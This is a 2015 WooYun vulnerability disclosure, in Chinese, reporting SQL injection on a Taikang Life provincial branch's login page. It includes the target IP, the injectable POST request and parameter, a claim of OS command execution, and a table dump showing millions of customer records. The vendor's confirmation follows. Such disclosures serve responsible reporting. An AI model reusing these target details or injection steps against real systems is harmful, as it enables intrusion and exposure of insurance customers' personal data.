当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142206

漏洞标题:泰康人寿某省分公司存在sql注入涉及22个数据库数百万的信息,可执行os-shell

相关厂商:taikang.com

漏洞作者: Martial

提交时间:2015-09-19 19:51

修复时间:2015-11-04 12:06

公开时间:2015-11-04 12:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-19: 细节已通知厂商并且等待厂商处理中
2015-09-20: 厂商已经确认,细节仅向厂商公开
2015-09-30: 细节向核心白帽子及相关领域专家公开
2015-10-10: 细节向普通白帽子公开
2015-10-20: 细节向实习白帽子公开
2015-11-04: 细节向公众公开

简要描述:

涉及22个数据库数

详细说明:

注入点
http://220.178.0.94/tk/manage/login.aspx
(POST)
__VIEWSTATE=/wEPDwUJNTQyMTIwMTc2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUJaWJ0bkxvZ2luBQhpYnRuUmVzdJNMXpxDk6Rmm3lkRC%2BVxIRqnGXg&__EVENTVALIDATION=/wEWBQLY0bO2AQLStq24BwKCgvyABQKBo5SvBQLYwuqHD2puFIpnXij1uuh5pdSr/z/SYtXv&tbUsername=admin&tbuserpass=111111&ibtnLogin.x=0&ibtnLogin.y=0
注入参数是tbUsername
来跑下数据库

1.jpg


看到一个数据库的名字为taikang
跑了一下 发现百万级别的大量信息

2.jpg


再看下当前数据库mobilework

4.jpg


再看下 customer 这个数据库的信息

5.jpg


可执行命令

3.jpg

漏洞证明:

Database: customer
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.clntpf | 34913814 |
| dbo.clntpf2014 | 6398442 |
| dbo.clntpf20090703 | 5563155 |
| dbo.clntpf2013 | 4622330 |
| dbo.clntpf20090702 | 3872145 |
| dbo.clntpf2012 | 3685057 |
| dbo.clntpf20090701 | 2854816 |
| dbo.clntpf2011 | 2599930 |
| dbo.clntpf2010 | 2486707 |
| dbo.clntpf200907before | 1563754 |
| dbo.clntpf200907after | 1095907 |
| dbo.ipe_chdrinfo | 953183 |
| dbo.rta1 | 333085 |
| dbo.rta1b | 253670 |
| dbo.clntpf20090704to20090731 | 171571 |
| dbo.p25 | 15465 |
| dbo.use20141126 | 3843 |
| dbo.p24 | 1689 |
| dbo.sysconstraints | 3 |
| dbo.syssegments | 3 |
+------------------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 Martial@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-20 12:04

厂商回复:

已确认是一停用系统,已安排下线处理。
非常感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-19 20:42 | 纯情 ( 路人 | Rank:15 漏洞数:1 | 站在人生的顶端,俯视生命的千姿百态。)

    6666666。大妞妞